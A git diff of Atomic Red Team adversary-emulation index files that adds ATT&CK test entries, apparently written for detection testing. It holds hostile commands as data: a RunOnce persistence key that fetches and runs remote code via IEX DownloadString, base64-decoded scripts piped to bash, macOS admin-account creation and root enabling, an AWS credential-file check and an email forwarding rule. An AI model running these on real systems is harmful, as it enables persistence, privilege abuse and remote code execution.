+          ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+        cleanup_command: |
+          cd #{stratus_path}
+          echo "Stratus: Start Cleanup."
+          ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+          echo "Removing Stratus artifacts from local machine."
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
   T1217:
     technique:
       x_mitre_platforms:
@@ -87787,10 +88425,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=subnet)\n"
         name: command_prompt
@@ -88080,10 +88717,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
         name: command_prompt
@@ -88107,10 +88743,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -gcb -sc trustdmp\n"
         name: command_prompt
@@ -90363,10 +90998,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=computer)\n"
         name: command_prompt
@@ -90390,10 +91024,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc dclist\n"
         name: command_prompt
@@ -104257,6 +104890,55 @@ initial-access:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1566.003:
     technique:
       x_mitre_platforms:
@@ -104416,6 +105098,45 @@ initial-access:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index 7c5f899b..3d22c2ae 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -4192,6 +4192,52 @@ defense-evasion:
           echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
           echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
           echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+    - name: Linux Base64 Encoded Shebang in CLI
+      auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+      description: "Using Linux Base64 Encoded shell scripts that have Shebang in
+        them. This is commonly how attackers obfuscate passing and executing a shell
+        script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
+        by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
+        Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
+        for it. \n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        bash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        dash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        fish_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        sh_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+      dependencies:
+      - description: 'base64 must be present
+
+          '
+        prereq_command: 'which base64
+
+          '
+        get_prereq_command: 'echo "please install base64"
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          echo #{bash_encoded} | base64 -d | bash
+          echo #{dash_encoded} | base64 -d | bash
+          echo #{fish_encoded} | base64 -d | bash
+          echo #{sh_encoded} | base64 -d | bash
   T1562:
     technique:
       x_mitre_platforms:
@@ -31059,6 +31105,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -58111,7 +58158,78 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1580
+    atomic_tests:
+    - name: AWS - EC2 Enumeration from Cloud Instance
+      auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+      description: 'This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets,
+        iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails,
+        ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors)
+        from the context of an EC2 instance role. This simulates an attacker compromising
+        an EC2 instance and running initial discovery commands on it. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1580/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if test -f "#{stratus_path}/stratus"; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" = \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" = \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i linux_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi
+          \n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          export AWS_REGION=#{aws_region}
+          cd #{stratus_path}
+          echo "Stratus: Start Warmup."
+          ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+          echo "Stratus: Start Detonate."
+          ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+        cleanup_command: |
+          cd #{stratus_path}
+          echo "Stratus: Start Cleanup."
+          ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+          echo "Removing Stratus artifacts from local machine."
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
   T1217:
     technique:
       x_mitre_platforms:
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index 902c03df..a2be61d8 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -3845,6 +3845,52 @@ defense-evasion:
           echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
           echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
           echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+    - name: Linux Base64 Encoded Shebang in CLI
+      auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+      description: "Using Linux Base64 Encoded shell scripts that have Shebang in
+        them. This is commonly how attackers obfuscate passing and executing a shell
+        script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
+        by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
+        Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
+        for it. \n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        bash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        dash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        fish_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        sh_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+      dependencies:
+      - description: 'base64 must be present
+
+          '
+        prereq_command: 'which base64
+
+          '
+        get_prereq_command: 'echo "please install base64"
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          echo #{bash_encoded} | base64 -d | bash
+          echo #{dash_encoded} | base64 -d | bash
+          echo #{fish_encoded} | base64 -d | bash
+          echo #{sh_encoded} | base64 -d | bash
   T1562:
     technique:
       x_mitre_platforms:
@@ -16383,6 +16429,45 @@ defense-evasion:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1211:
     technique:
       x_mitre_platforms:
@@ -26923,6 +27008,45 @@ privilege-escalation:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1574.012:
     technique:
       x_mitre_platforms:
@@ -29827,6 +29951,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -43339,6 +43464,45 @@ persistence:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1574.012:
     technique:
       x_mitre_platforms:
@@ -55344,7 +55508,78 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1580
+    atomic_tests:
+    - name: AWS - EC2 Enumeration from Cloud Instance
+      auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+      description: 'This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets,
+        iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails,
+        ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors)
+        from the context of an EC2 instance role. This simulates an attacker compromising
+        an EC2 instance and running initial discovery commands on it. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1580/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if test -f "#{stratus_path}/stratus"; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" = \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" = \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i linux_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi
+          \n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          export AWS_REGION=#{aws_region}
+          cd #{stratus_path}
+          echo "Stratus: Start Warmup."
+          ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+          echo "Stratus: Start Detonate."
+          ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+        cleanup_command: |
+          cd #{stratus_path}
+          echo "Stratus: Start Cleanup."
+          ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+          echo "Removing Stratus artifacts from local machine."
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
   T1217:
     technique:
       x_mitre_platforms:
@@ -67931,6 +68166,45 @@ initial-access:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
 exfiltration:
   T1567:
     technique:
diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml
index cba75487..1bd43de5 100644
--- a/atomics/Indexes/office-365-index.yaml
+++ b/atomics/Indexes/office-365-index.yaml
@@ -27503,6 +27503,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -42069,7 +42070,7 @@ collection:
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
           Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
         cleanup_command: |
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -51289,6 +51290,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/saas-index.yaml b/atomics/Indexes/saas-index.yaml
index 680550b0..7bf0175d 100644
--- a/atomics/Indexes/saas-index.yaml
+++ b/atomics/Indexes/saas-index.yaml
@@ -27418,6 +27418,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -51156,6 +51157,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index 9b22b892..85ee6d3c 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -9717,7 +9717,7 @@ defense-evasion:
       description: Modify event viewer registry values to alter the behavior of the
         online help redirection. Upon opening an event in event viewer and attempting
         to view the help page for the event, it will execute the program defined in
-        thed redirection program registry entry.
+        the redirection program registry entry.
       supported_platforms:
       - windows
       input_arguments:
@@ -33011,7 +33011,7 @@ privilege-escalation:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -33061,7 +33061,8 @@ privilege-escalation:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -42210,7 +42211,158 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
-    atomic_tests: []
+      identifier: T1559
+    atomic_tests:
+    - name: Cobalt Strike Artifact Kit pipe
+      auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          1
+
+          '
